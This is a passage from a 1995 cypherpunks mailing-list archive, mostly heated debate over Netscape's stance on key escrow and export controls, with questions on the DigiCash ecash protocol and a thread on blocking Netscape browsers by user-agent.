it. > >Is there any way one could set up a dirty pictures web >page in such a fashion that it would be difficult, painful, >and impractical to get at the pictures through that page >with a netscape browser? It would not be very hard. You just need to have all connections go through a CGI script first. There is a variable that reports the client to the server. Just bounce them to an error if the variable starts with "Mozilla". Also, you do not need access to the server code to do this if you are using NCSA. There is a way you can force execution of CGI scripts from your local directory using an .htaccess file. (It requires using an "addtype" command to enable the cgi parsing.) I will have to dig out the exact mime type required. If I get some working Netscape bounce code, I will post it here. (Actually I want one that bounces AOL users to the Mr. Rogers home page on pbs.org.) | Poly wants *more* than one cracker! | alano at teleport.com | |"It's only half a keyserver. I had to split the | Disclaimer: | |other half with the government man." - R. Rococo | Ignore the man | |`finger -l alano at teleport.com` for PGP 2.6.2 key | behind the keyboard.| | http://www.teleport.com/~alano/ | | From cp at proust.suba.com Sat Dec 2 17:14:34 1995 From: cp at proust.suba.com (Alex Strasheim) Date: Sun, 3 Dec 1995 09:14:34 +0800 Subject: Info on Netscape's key escrow position In-Reply-To: <01HYCC2KMZJ48WZ6BG@mbcl.rutgers.edu> Message-ID: <199512030053.SAA00818@proust.suba.com> > If we as a company were to take the position that in no case will we allow > a government to get access to our encrypted messages, or refuse to allow > key escrow with our products, the governments of the world will quickly put > us out of business by outlawing the sale of our products in their countries. > The fundamental issue is how do we accommodate the requirements of > governments, while protecting our rights as citizens. > > None of this represents the position of Netscape with respect to what we > will do. But if we do not come up with a solution to this problem that is > acceptable to each government, we will not be able to export our products, > except with a short key length (e.g. 40 bit keys), and that will not be > acceptable to corporate customers in other countries. They will create their > own solution, and we will not be able to sell to a larger world market. In > fact, we could even be ordered by our own government to establish a key > escrow system for its use inside the US. I don't expect Netscape, as a corporate citizen, to engage in civil disobedience. But I hope that Netscape will take seriously its obligation to protect the rights of citizens. Decisions that businesses make have big effects on the way day to day life exists all over the world. GM makes decisions that affect how safe transportation will be and how much it will cost. Microsoft makes decisions that effect millions of people's work environments. Even small businesses have small bits of power: I run a little ISP, and a few hundred people depend on me to protect the privacy of their email. The decison that Netscpae is faced with now is a big one. It's going to have widespread and long lasting consequences for privacy and civil liberties all over the world. When you look at what's going to happen on the ground, it's probably as important as a major decision by the Supreme Court. We understand that government officials in this country and elsewhere are putting pressure on Netscape. But you should understand that the public is overwhelmingly in favor of universal access to strong crypto. This is a democracy, after all, and the FBI and NSA still work for the people. If you need help standing up for what's right, you'll get it. Take your case to the public, and you'll be suprised at the response you'll get. Why not say: 1 Netscape will follow all laws and regulations. 2 The current rules are forcing Netscape to choose between providing reasonable levels of privacy to its customers and competing in the international marketplace. 3 Netscape feels the rules should be changed to make this choice unnecessary. If you make that argument publicly, you'll get widespread support from the business communitity and the general public. And if it turns out that we can't win, you can always fall back on selling totalitarian-friendly products. From sameer at c2.org Sat Dec 2 17:16:00 1995 From: sameer at c2.org (sameer) Date: Sun, 3 Dec 1995 09:16:00 +0800 Subject: GAK Flap Happening at a Good Time--Journalists Read! In-Reply-To: <30C0EF90.132D@netscape.com> Message-ID: <199512030053.QAA15582@infinity.c2.org> > How would having an official representative from Netscape in > the audience have influenced the outcome of the proceedings? I would It's called moral support for our lawyers. Cindy mentioned after the hearing at lunch how much it helped to have people in the audience. Having official people from industry would probably have helped her morale even more. > have liked to attend, but was in the process of trying to get > a beta release out at the time. Ah, I see, so the short-term goal of making sure a beta release isn't one day late takes precedence over the long term future of cryptography. (And, essentially, your company's long term profits.) -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From sameer at c2.org Sat Dec 2 17:17:54 1995 From: sameer at c2.org (sameer) Date: Sun, 3 Dec 1995 09:17:54 +0800 Subject: Why Netscape employees should not leave... In-Reply-To: Message-ID: <199512030035.QAA14181@infinity.c2.org> > Nor are HTTP servers. http://www.c2.org/apachessl/. Commercial availability within a week or two. (Yeah, I know, I've been saying that for a while. This time I *really* mean it. ;-) -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From unicorn at schloss.li Sat Dec 2 17:27:20 1995 From: unicorn at schloss.li (Black Unicorn) Date: Sun, 3 Dec 1995 09:27:20 +0800 Subject: GAK Flap Happening at a Good Time--Journalists Read! In-Reply-To: <30C0EE0D.48A9@netscape.com> Message-ID: On Sat, 2 Dec 1995, Jeff Weinstein wrote: > Black Unicorn wrote: > > AT&T seems to have been suitably 'incentivized' > > The receipt of government funding (in whatever guise) might be just as > > powerful in this case. > > > > To the outsider, it looks as if Netscape 'owes' the government. > > We do owe the government. They have paid us for Servers and Clients > that support Fortezza. That is what we owe them. The money that the > NSA gave us for Fortezza is not very significant compared to what we > are getting from commercial sources. Obviously it was significant enough to take. It was also a perfect opportunity for Netscape to express concerns about the future of the technology, which is in netscape's interest. The astute deal maker would be happy to work with the NSA on his own terms. Instead, it would appear that Netscape is working FOR NSA on their terms. > > > We are actively lobbying in washington to get clarification of the > > > current regulations so that we can provide the US version via an "export > > > controlled" FTP or HTTP download. > > > > With which firm? Or have you made it an in-house effort? > > We have recently hired a government liason person to manage our policy > discussions with the government. He is one of the people that will be > talking to congressional and white house representatives next week. > I don't know if we have made use of any outside lobbying firms. I'd be interested to know what a 'government liason person' is. It sounds to me like an 'in house lobbist.' There is an old joke in the beltway about in house lobbists. I also would like to know why you are actively lobbying for 'claification' rather than 'modification' of the current policy. Netscape seems to be taking the position, "We'd love it if you'd let us do X, but we are happy to roll over for whatever." and "By the way, what is the rule on exporting software again?" I am impressed that some effort is being made. I think it in the form of 'too little, too late.' But hey, who am I? > --Jeff > > -- > Jeff Weinstein - Electronic Munitions Specialist > Netscape Communication Corporation > jsw at netscape.com - http://home.netscape.com/people/jsw > Any opinions expressed above are mine. > --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From nobody at REPLAY.COM Sun Dec 3 09:29:56 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 3 Dec 95 09:29:56 PST Subject: Talking to Jim Message-ID: <199512031730.SAA06145@utopia.hacktic.nl> -----BEGIN PGP SIGNED MESSAGE----- Jim Clark was quoted as having written: > I made some pragmatic comments. > I said that if we are to use this encryption technology in > business, we must have a better solution than to limit > keylength or put keys in escrow. All governments of the world > have a valid concern about terrorism and other activities of > concern to the security of their nations. So what? If their position were (as it has long been in some countries) that their "concern" is best addressed by wholesale eavesdropping and informant networks, would you cave to that, too? This is an absurd foundation. > All of them will continue to restrict our ability to provide > products to their markets unless we build in some mechanism > that allows them to legally access information that is in the > interest of their national security. Whoa! You're giving away the store without a fight! You've been able to capture what, 60-70% of the browser activity "market" and get a huge amount of capitalization from the public market, and you're whining that the world's going to end if government "restrictions" continue, just because those restrictions might slow down your commercial world conquest? Give me a break! LET THEM CONTINUE to restrict! That will take care of itself quite handily. You're just afraid you'd miss some opportunities, or be one of the commercial casualties, isn't that right? Isn't that what this is really all about? And a valid concern, too, but not at the expense of my freedom! It seems clear from the way you put this that world standardization at ANY level of security would satisfy your commercial objectives. > (We obviously cannot be involved in determining what is legal > by the laws of that country.) Oh? Since when? Commercial interests have long had a heavy influence on government policies, up to and including laws and wars. Your own U.S. government doesn't hesitate to attempt to influence other governments in their enactment and/or modification of laws, even constitutions. Do you think for a moment that the Caribbean Basin Initiative (to mention just one) has anything remotely to do with the U.S.'s altruistic interest in helping Basin countries' economies? Its OVERRIDING purpose is to influence their tax laws and effectively extend U.S. jurisdiction to those countries. In any case you're writing as if you were selling screwdrivers, not the new wave of IT. You are riding the crest of a technological revolution that is going to make some laws, some governmental policies, even some governments, MOOT. Those it doesn't bypass it will certainly not leave untouched. To be sure, there is awesome power in the hands of governments, but it is also a fact that governments can be very fragile things. Many have fallen in the history of humankind, and modern "free" societies are supposed to have governments that serve, not dictate. Governments, geared to human processes that proceed at human speeds, unable in their inefficiency even to keep up with ordinary humans, will be completely unable to stay ahead of IT. Governments that get in the way will disintegrate. Governments that embrace the future will survive. For you or anyone else to run around to the rear and stick their tongue firmly up government's ass is exactly the wrong strategy for the future. > This is not just a US government problem. Until recently, > France did not even allow us to sell products with 40-bit > keys, much less 128-bit keys. And some of us think that such idiocy, like celibacy, is a self-correcting phenomenon in this information age. If the French government wants to keep France behind the curve, that's fine. The French people will eventually put fire to their politicians' feet as their economy is increasingly bypassed and slides down the tubes. It's not YOUR problem to solve by going into agreement with the totalitarian objectives of Stone Age governments. > A lot of ordinary citizens are rightly concerned about their > own privacy. No shit! > I am one of them. You could have fooled ME! > I do not want the government to snoop on me, It seems you really don't care, as long as you can firm up your billion and maybe roll it up to ten. Money buys a lot of things in this world, and as long as Jim can buy HIS privacy some day, hey, that's cool! But give a bit of thought to whether your children's privacy and safety will be able to be bought in a world made safe for Big Brother by commercial interests willing to give away the freedom store. > but in fact the government, through the FBI, can now tap my > phone without my knowing it by simply getting sufficient > evidence that I am conducting illegal activities, then > presenting this evidence to a court to get permission. I have > no say in the matter. So, therefore, nothing matters, right? Don't fight for the right to put locks on your doors, because if the government really wants to get in your house, they will. Here's a flash bulletin, Jim: That's not the kind of thinking that secured the freedoms Americans like to think they have. It is, though, the kind of thinking that can end them. > If we as a company were to take the position that in no case > will we allow a government to get access to our encrypted > messages, or refuse to allow key escrow with our products, > the governments of the world will quickly put us out of > business by outlawing the sale of our products in their > countries. Obviously specious, because Netscape came into existence in a world of controls over which it had no influence. Having thus come into existence, and quite successfully so far, it is absurd to claim that if you don't cave and become supine enough to slide under the barriers that already existed, you will be put out of business. I believe you have underestimated the power of a leading-edge 21st-century information product that is "Not available where regulated." I think you're copping out and looking for the easier, "Now with the best encryption available! (because no one is allowed to offer better)" > The fundamental issue is how do we accommodate the > requirements of governments, while protecting our > rights as citizens. No, Jim, that is not nor has it ever been the fundamental issue for business or individuals, least of all in the last few centuries in the free world. The issue for free people is how to secure the blessings of freedom, shaping government as necessary, so they can get on with their lives, which in turn is, after all, what everything is ultimately about. Your statement is more suited to the European authoritarian mindset, which has never quite come to grips with the idea of natural rights originating in individuals and flowing, WHEN AND IF THEY FLOW, by delegation to governments. The legitimate purpose of government is not to tell you what your boundaries and constraints are. The Declaration of Independence correctly states that the legitimate purpose of government is to secure freedoms which do not themselves originate in government. > None of this represents the position of Netscape with > respect to what we will do. Oh, garbage! You've just set forth the viewpoints of one of the key people who determines what Netscape's positions will be, and further, that you agreed in this with a bunch of other commercial interests! > But if we do not come up with a solution to this problem > that is acceptable to each government, There it is: Supine, prostrate, submissive. Jim, there are some alt. newsgroups where you could make a bit hit with that approach. A few thousand Mistress X's in leather await a man willing to obey their every command. > we will not be able to export our products, Whiiiiine! > except with a short key length (e.g. 40 bit keys), and that > will not be acceptable to corporate customers in other > countries. They will create their own solution, and we will > not be able to sell to a larger world market. This is the heart of the matter. Dominating the U.S. market is in no way sufficient to your appetite. Maintaining a clear technological lead here, with consequent pressure on controlled markets to lift their controls and to pressure the U.S. to lift its export controls, is not what you see as the better strategy. You fear losing momentum, you covet those foreign markets, perhaps you even fear the emergence of superior foreign technology given clear incentive over time. Your choice, then, is to be an instrument in furtherance of totalitarianism in order to improve what you perceive to be your shorter-term odds, and to justify it on the basis that it is inevitable anyway. Bad. Very bad. > In fact, we could even be ordered by our own government to > establish a key escrow system for its use inside the US. You seem to have walked so far down the road of saluting government that you've forgotten that there is a Congress. This is supposed to be a government of laws, not orders. It's an entirely different issue, though, than the one of embracing GAK in a bid for world browser conquest. If U.S. GAK comes to pass, it will not be without discussion and debate, some of it no doubt quite heated. Everyone will have to deal with it as they see fit. That's not the same thing as a cow offering itself for genetic engineering in order to slither a new, longer neck under the bottom strand to reach that greener grass at the expense of its legs (that's tortured, but I think it makes a nice image). Your manner of expression supports my impression that someone has innoculated you with GAK juice. The power of influential people to do that, and to follow through on their veiled or not so veiled threats depends entirely on their remaining unseen to the public. I'd STILL like to know who got to you and what they said. > Ironically, anyone in the US may import unbreakable > encryption technology from another country -- we just > cannot sell it back to them. No one ever accused the > government of being rational. This is the clearest thing you've written in the whole piece (though it sheds no light on Netscape's position). Makes you want to kick yourself for not having set up shop in some other country in the first place, doesn't it? You can BET that other people ARE setting up shop in other countries, even as we write. The logistics of information over distance are collapsing at an astonishing rate. What would have been difficult or prohibitively expensive five years ago is feasible today. What seems too much trouble today will be a piece of cake next year. What you *could* have done early on, had you or anyone else clearly seen where this was headed (and hey, who did?), would have been to contract with a resource in a crypto-unregulated jurisdiction, perhaps even one where constitutional or legislative bars to such control exist or could be construed, to license the necessary parts your company in the form you need them. Done right, this could have positioned you to import the crypto as it could be imported into any supposedly free country, penalizing thereby only the thoroughly clueless countries. You would never have been in the position of exporting it. If the dotted line in your product can't be at the "hooks" level because of restrictions, there is some level higher than that and lower than "run netscape" at which the dotted line CAN be drawn and still pass muster, or all software in the world would be stillborn. Too late now, eh? Maybe. Maybe not. > I chair an industry group called the "Global Internet > Project", with members from almost twenty companies, > including companies from Asia and Europe. This was the > central issue we all agreed upon this morning, and we > are putting together a policy statement whose purpose > is to educate lawmakers on the importance of quick > resolution of this matter. That's scary. You'd be better advised to hang around with people steeped in the rugged individualism of America's genesis. If you put your efforts into creating irresistible forces in the marketplace you could leave the process of educating lawmakers to their constituents, who would do it by putting political fire to their feet, something to which politicians respond better and faster in any case. How many of the people who pay your bills do you think will be comfortable with the idea of you cuddling up with a bunch of other self-appointed world planners (some of whom no doubt come from countries where freedom is a quaint notion that has never quite been fully grasped), dividing up their freedoms and handing them to governments on a silver platter, presumably in exchange for injections of grease to your money machine? > Thanks for your concern. You're welcome. > Let me know what you like and don't like. Now you know. One of the great values in the new information paradigm is that you can, if you choose, read messages no one would have dared bring you in the insular past. Executives who get to hear only what they want to hear usually fail, often spectacularly. Any executive in a publicly-discussed business today who wants to take the pulse of real people has only to tune in and see for himself. It takes courage, though. We Jurgar Din (that will have to suffice: I do not yet live in a free country) +"The battle, Sir, is not to the strong alone. It is to the+ +vigilant, the active, the brave. Besides, Sir, we have no + +election. If we were base enough to desire it, it is now + +too late to retire from the contest." -Patrick Henry 1775 + -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBVAwUBMMHTCUjw99YhtpnhAQFq8gH+Kr2QhcP7wWh0jdOM+2UBWldm0jDgcR5p HTXsoHbYVc8Q8LRwpcV33T4Jq+z7OTFGBX7RuyIRDkGSmloZ6NGbag== =Skic -----END PGP SIGNATURE----- From nobody at REPLAY.COM Sat Dec 2 17:32:34 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 3 Dec 1995 09:32:34 +0800 Subject: Getting a copy of the Jim Clark speech Message-ID: <199512030120.CAA06452@utopia.hacktic.nl> -----BEGIN PGP SIGNED MESSAGE----- Alan Olsen wrote: >>Is there any way one could set up a dirty pictures web >>page in such a fashion that it would be difficult, painful, >>and impractical to get at the pictures through that page >>with a netscape browser? > >It would not be very hard. You just need to have all connections go through >a CGI script first. There is a variable that reports the client to the >server. Just bounce them to an error if the variable starts with "Mozilla" > >Also, you do not need access to the server code to do this if you are using >NCSA. There is a way you can force execution of CGI scripts from your local >directory using an .htaccess file. (It requires using an "addtype" command >to enable the cgi parsing.) I will have to dig out the exact mime type >required. A much simpler method exists for serving special documents dependent on client profile, provided you are using Apache 0.8.x (I know sameer is). See http://www.apache.org/docs/content-negotiation.html I suppose someone should ask: what is the crypto relevance of this thread? None. Wilhelm Busch -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMMD6xoiUi5SQtQ3tAQHk4Af/Z9aODx5rNHtY7KG7ekNDASfr/Mv6oLh9 GVUzHgBvuMnDBnvf963XT/FYpr3EMYZxbXUx/Y7b0mb0walw21/1cVp+W3NCRwse Di/7V6p1jmHESLAYJbM0CfLS0Tm82Q+jU1XRmuHVt4pBPK06gQI65uErlNNmkt0h ZUMifhmn1vgQmdSMSHJyWzKB9PNi5ucoR2o1lt74LAfkV25wiHxcHSSOMvGvvRNL G52EjucDL8XEqzDMo3yO+ilWrf3yGgF/HaqzrugVpThgaJIxCYsMm+pF6MHO2wJk 2308thIEC5LrF+eSnO+duYAFpKsG0YNBEljG5zG3bFp8rd8N+D8yZQ== =G8Wv -----END PGP SIGNATURE----- -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQEPAzC9XzIAAAEIAMJ9b1kiyvrhoa5OGf7G1hSt6yWmzX7napWo5qRAh+xUE+Ue ftxUmGE1p/lFoUJIRKhH2I0yktcp3Wirmm61rIfJ5S0s9BnE3W+Uk8B1jxim2JvZ ezOPn0so+dUJP4tvtzDQZDCk5VGTsJkMAvhxahripQKpkWC5qL9nM9cvKa2ZnFjT 8NRaaAx1eMST/k4ntc431jFXNgnBDrxNBb8RNMb7b7jtFGOFN8Y3Mj5TmprXps2V ydtL57Z85MKfFjkAMeMtugqieJBWEsqA3C1/wKhB9cKb1Rdu/97VpZ0v+FQe9Y1k qwsQ78chNzBpfHjxSSuo8T4NV0AZiJSLlJC1De0AEQEAAbQNV2lsaGVsbSBCdXNj aA== =/fpw -----END PGP PUBLIC KEY BLOCK----- From perry at piermont.com Sat Dec 2 17:34:17 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 3 Dec 1995 09:34:17 +0800 Subject: Talking to Jim In-Reply-To: <199512012310.KAA23844@iccu6.ipswich.gil.com.au> Message-ID: <199512021417.JAA10944@jekyll.piermont.com> PeterWiltshire writes: > I emailed Jim Clark day before yesterday about his comments re key escrow. > He responded. As it's not good form to post private email, might I suggest > that one of the 'elders' here put to Jim a list of questions on the proviso > that his answers can be posted to the list. You never know, a lot of > speculation might be confirmed or denied. Why doesn't he just post on his own? Its not like this mailing list is unknown -- we got him bad press on the cover of the Times in the past. Anyone is free to send email here. Perry From iang at cory.EECS.Berkeley.EDU Sat Dec 2 17:44:42 1995 From: iang at cory.EECS.Berkeley.EDU (Ian Goldberg) Date: Sun, 3 Dec 1995 09:44:42 +0800 Subject: Questions/Comments on ecash protocol In-Reply-To: <199512012222.OAA18230@netcom14.netcom.com> Message-ID: <199512030127.RAA03496@cory.EECS.Berkeley.EDU> Lucky Green wrote, to our great pleasure: > By popular request, DigiCash is releasing the protocol specs. > > The specs are available at > http://www.digicash.com/ecash/protocol.html > > Please be aware that the doccument is work in progess. More > specifications, including byte level descriptions of the message > format will be added throughout the weekend. I read these specs for a little while last night. Here are some of my questions/comments. To prevent this message from becoming huge, I won't quote much from the protocol document itself; the URL is above if you want it. I'll ignore the spelling/grammar; they can be fixed later. Also: would people prefer if this discussion were moved to the ecash mailing list (ecash at digicash.com)? I _would_ prefer that this was discussed in public, though, and not just with DigiCash. First: Could you put some kind of protocol version number (so we know when the protocol changes) and document version number (so we know when the document changes, and can reference a particular version) somewhere near the top of the document? I realize that the document is incomplete. For example, it is missing a description of the SETUP_REQ message and response. From what I can gather from other wording in the document, this message is used to get the bank's public key. I would hope this key is certified in some way. Alternatively, I notice that the ecash client, in the routine ec_cash_setup, passes a value called hard_n (a 768-bit composite) to check_sig. Does this mean that the bank's public key (or at least the public key used to sign the message containing that bank's real public key) is fixed, and hardcoded into the client? What is the function f, used in the payment_hdr to hash the payer_code and desc fields, as well as in WITHDRAW3 to calculate N = f(n) * r**h? There is reason to believe it is SHA, but I thought I saw some stuff in the client that indicated that the output of f is 132 _bytes_ long (but I'm not exceptionally sure of this, not having source and all). What are the flags used in the Withdraw Request and the payment_hdr? Please clarify what parts of the payment_hdr are shipped around. The document says that the shop checks if the descr_hash matches the description. Since the description is in the second part of the payment_hdr, does that mean that both parts are sent to the shop? Noticing that the payer_code (which the payer is supposed to keep secret) is in the second part, this doesn't seem to be right. Also, the document states that the payment hash is not sent from the payer to the shop or from the shop to the mint. However, the payment hash is just the SHA of the first part of the payment_hdr, which _is_ sent around, so although the payment hash isn't transmitted per se, it can certainly be calculated. What is the expries field in the payment_hdr? Note that it's an int rather than a time. A (very slight) privacy concern: the payer's bank is sent in the clear, which gives a very small amount of information about the identity of the payer. More on who knows what later. Is it in fact the case that all coins on one payment use the same payment hash when encrypting their signatures (the field sig in onl_coin)? If (M,e) is the mint's public modulus/exponent, and (N,h) is public mod/exp for a particular coin denomination, are the following statements true: o If n is the coin number (in onl_coin, assumedly the same n as used in the withdraw request), and hdr is the first part of the payment header, then sig (in onl_coin) equals ([ SHA(hdr) XOR ((f(n)^(1/h)) mod N) ] ^ e) mod M o A deposit (which contains a userID in the userhdr, a payment_hdr in the dep record, and a pair (n,sig) for each coin) is accepted by the bank iff ([ SHA(payment_hdr) XOR ((sig^(1/e)) mod M) ] ^ h) mod N = f(n) _and_ either payment_hdr.shop_accID corresponds to userID, or a payer_code is supplied such that payment_hdr.payer_hash = f(payer_code). Since the payer_code is not supposed to be sent around, how is it sent to the bank in order to cancel a payment? The document says "This allows him to cancel the payment (deposit in his account)...", which seems to indicate that a cancellation is just a deposit (made out to someone else), accompanied by an appropriate payer_code. It is important that an eavesdropper not be able to ever see the payer_code that corresponds to a payment, or else she could present both to the bank and say "cancel this payment", and get the money "back". Where is the facility for tracing double spenders? Perhaps it's just part of the "incomplete" part of the document, but I can't even see where it would fit in to what we've got; neither the withdrawal nor the payment messages seem to encode _any_ information about the payer in the coins, and the bank cannot seem to know who withdrew the coin that ended up being spent twice (due to the blinding). Is there a way to change the public key associated with an account? Is it just a meeter of sending another OPENACC1 message? Exactly what kind of anonymity/privacy/security does ecash offer? Let's examine who knows what. Our cast of characters: Charlie, the customer Sam, the shopkeeper the Bank (for simplicity, both Charlie and Sam use the same Bank for now) Eve, a passive eavesdropper Mitch, an active Man-In-The-CHannel the Government (which may try to force others to reveal information) Depending on which channels Eve and Mitch have access to, and whether or not they can tell, by examining the channel, or by selection, the identities of one or more of the communicating parties, they can get varying amounts of information. I'll assume they have access to all communications for now. Not knowing the SETUP_REQ protocol is problematic. As mentioned above, steps need to be taken to prevent Mitch from getting Charlie's password and using it to usurp his account. We will assume that it turns out OK, and that Charlie can successfully open an account with a private key known only to him, and that he correctly knows the bank's public key. [ As this is getting long, I've snipped a bit from here. I'll put it back, with more detail, when the protocol document is more complete, and my questions above have been answered. ] In short, a couple of things: Eve and Mitch know how much was paid to whom, and for what. If they can tell (say, by TCP header) who was sending the payment or receiving the payment request, they know who paid as well. If Eve or Mitch can determine either r (the blinding factor) used in the withdrawal, or the payer_code, used in the payment, they can steal the money. This has ramifications to Doug's "agnostic" banks; more security has to be added to the present ecash system if unblinded withdrawals are allowed. This also brings up the "Netscape" question: how are these numbers generated? Does it have to do with that 25 character string you enter at the beginning? I've noticed a bit in the program that seeds a RNG with (time(0) ^ ((getpid()<<16)|getuid())). I think publication of _at least_ the code pertaining to blinding factor and payer_code generation is _absolutely vital_. I think I'll stop here; comments from anyone, and especially answers to my questions from DigiCash people, are welcome. I'm sorry if it's not as complete as you (or I) would like; I'm quite tired, as my building had two fire alarms in a row at 3am this morning... - Ian "Well, it's a start..." From jya at pipeline.com Sun Dec 3 09:53:06 1995 From: jya at pipeline.com (John Young) Date: Sun, 3 Dec 95 09:53:06 PST Subject: Transatlantic Agenda Message-ID: <199512031752.MAA29656@pipe1.nyc.pipeline.com> If anyone knows where to get a copy of this document -- especially those surely secret concordances that address the agenda of this list -- please whistle: MADRID, Dec 3 (Reuter) - U.S. President Bill Clinton and European Union leaders signed on Sunday a so-called New Transatlantic Agenda intended as a blueprint for Euro-American relations into the 21st century. The document encompasses cooperation on trade, security, human rights, aid, democracy, health care and crime-fighting among other subjects. From nobody at REPLAY.COM Sat Dec 2 17:56:00 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 3 Dec 1995 09:56:00 +0800 Subject: Fight.comp.crime.like.a.paranoid.FBI.psycho Message-ID: <199512030145.CAA06945@utopia.hacktic.nl> Coming to Terms with Computer Crime Computer Crime: A Crimefighter's Handbook David Icove, Karl Seger, and William VonStorch O'Reilly and Associates Inc., $24.95; 800-998-9938 ISBN: 1-56592-086-4. By Don Willmot If you tend to be a paranoid type of person, Computer Crime: A Crimefighter's Handbook will keep vou up at night pondering the incredible number of computer crimes that people can commit and the difficulties involved in stopping them. The book, split into sections that deal with defining computer crimes. preventing them, and handling them, is loaded with fascinating facts. When you stop to think about it. the number of different types of crime is alarming: sabotage. revenge, vandalism, theft, eavesdropping, even "data diddling." For each type of attack, the book suggests preventive measures and strategies, all in commonsense style and plain English. You'll feel like an FBI agent as you read the personality profiles of different types of computer criminals. Hackers, crackers, and vandals are all psychoanalyzed, and interesting charts of "vulnerabilities" and "countermeasures" will help you make plans to keep your organization safe from outside attack. The book includes discussions of everything from choosing locks and keys to interviewing personnel, setting up "concentric circles" of defense perimeters, and forming a crisis-management team to handle the fallout from a successful computer crime. There's even an entire page devoted to all the passwords you should never use. Almost one-third of the book is given over to the actual text of federal and state laws used to prosecute computer crime. This section is meant not to be read but to be used instead as a reference. From sameer at c2.org Sun Dec 3 09:56:46 1995 From: sameer at c2.org (sameer) Date: Sun, 3 Dec 95 09:56:46 PST Subject: prototype slot-machine In-Reply-To: Message-ID: <199512031751.JAA01922@infinity.c2.org> > Try this site: Offshore Infomation Services in Anguilla, > http://www.offshore.com.ai/ Hey, fancy that, even though gambling is illegal in California you're saying that on a site two feet from my desk it's legal? cool. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From OpsAn at gnn.com Sun Dec 3 09:59:20 1995 From: OpsAn at gnn.com (Michael Coates) Date: Sun, 3 Dec 95 09:59:20 PST Subject: INTERNET SECURITY RISKS FOR CONSUMERS OVERBLOWN Message-ID: <199512010610.BAA15528@mail-e1a.gnn.com> Just got this and found it interesting. You may have seen it already...published in today's issue of Investor's Business Daily. INTERNET SECURITY RISKS FOR CONSUMERS OVERBLOWN Fear of Internet crime is well-founded among businesses whose corporate networks may be compromised by curious hackers or malicious crackers, but "By and large, consumers have very little risk using and doing business on the Internet," says the chairman of Open Market Inc. While it is possible to break an encryption code and crack a secured phone line to discover an individual's credit card number, it's much easier to copy them off of discarded carbons. "If someone wanted to steal a credit card number, all they would have to do is go to any gas station and look on the ground around the pumps," says the CTO at Internet security firm Terisa Systems. (Investor's Business Daily 30 Nov 95 A8) From stripes at va.pubnix.com Sun Dec 3 10:02:21 1995 From: stripes at va.pubnix.com (Josh M. Osborne) Date: Sun, 3 Dec 95 10:02:21 PST Subject: Code to detect netscape & send a message (was Re: Barring access to Netscape) In-Reply-To: <199512010917.DAA28429@snoopy.vetmed.auburn.edu> Message-ID: In message <199512010917.DAA28429 at snoopy.vetmed.auburn.edu>, Frank Stuart write s: [...client-pull...] >After talking to a couple of people, and playing around some, this seems >to be a better choice. That way, you can actually send information (including >a list of where to get other browsers) instead of just garbage to netscape >users. Is anyone aware of browsers other than Netscape that do client pulls? There is at least one. However if you can have server-side includes, check out: http://www.va.pubnix.com/staff/stripes/nstest.shtml There is sample source for a netscape tester, and an example of it. If you can't do server side includes, try this (code not written): Add the client pull META tag to all your documents, have the client pull "/cgi-bin/bad-mozilla-no-mozilla-biscut". That script should check the browser type (so it can avoid anoying users of the few non-Mozilla browsers that do client-pull). Remember that a browser type of "Mozilla/1.22 (compatible; MSIE 2.0B; Windows 95)" (or similiar) is *not* netscape. If the browser type indicates a browser type you don't want to anoy you can just re-send the document that the PATH_TRANSLATED env. variable points to. If the browser type indicates a netscape product, then you can take your choice of actions: * Prepend ", then your text, then the origanal document again, so you might go for the next option) * Append " at the end - which almost nobody has). * Only give the "netscape sucks" message. I don't think this is a good idea since it it easyer to hammer your point across if people keep seeing the message then if they can't see your page, and decide to go elsewhere. [...] >That's not a bad idea either. Hopefully, Netscape will post a retraction >(soon!) and none of this will be necessary. Indeed, I hope so. Even if the retraction is formed internally by people going "Jim, this is going to put us at odds with the people who put up content, and gennerate bad press. It might be a better idea to try to stand up agenst GAK then go with it.". (and for the record, yes I do think there is a signifigant chance that the whole GAK thing is a mis-interpration). From nobody at REPLAY.COM Sun Dec 3 10:07:09 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 3 Dec 95 10:07:09 PST Subject: Jim Clark, "Mr. Bubble" Message-ID: <199512031807.TAA07090@utopia.hacktic.nl> -----BEGIN PGP SIGNED MESSAGE----- Alex Strasheim, 12/2/95, 6:53 PM: >I don't expect Netscape, as a corporate citizen, to engage in civil >disobedience. But I hope that Netscape will take seriously its obligation >to protect the rights of citizens. I do. I regard the capacity to do so as crucial, and I regard the fact that you *don't* expect them to as very telling. As has been pointed out extensively, the chances that he'll manage to hang on to his soft-earned cash until he can sell out are a long shot--unless he takes a stand against GAK. Governmental policy on the subject of crypto has relied upon secrecy, obscurity, and above all terrorizing individuals; the gov't would be extremely reluctant to throw the book Netscape, given its symbolic significance in the market. And even if it did, Clark's future would be assured--maybe after he got out of Club Fed, but assured nonetheless. Let me be clear: if Clark and Netscape said "We're implementing and releasing a version with a key length we support," crypto policy would be the lead story on the evening news--and the gov't would lose. The only question is how fast. >The decison that Netscpae is faced with now is a big one. It's going to >have widespread and long lasting consequences for privacy and civil >liberties all over the world. When you look at what's going to happen on >the ground, it's probably as important as a major decision by the Supreme >Court. >>We understand that government officials in this country and elsewhere are >putting pressure on Netscape. But you should understand that the public >is overwhelmingly in favor of universal access to strong crypto. This is >a democracy, after all, and the FBI and NSA still work for the people. >If you need help standing up for what's right, you'll get it. Take your >case to the public, and you'll be suprised at the response you'll get. You set forth all these silly generalities as though they suggest that NS's best bet--for Clark, for itself, for the public--is to go along with US policy? Bullshit. Their best bet is to use their 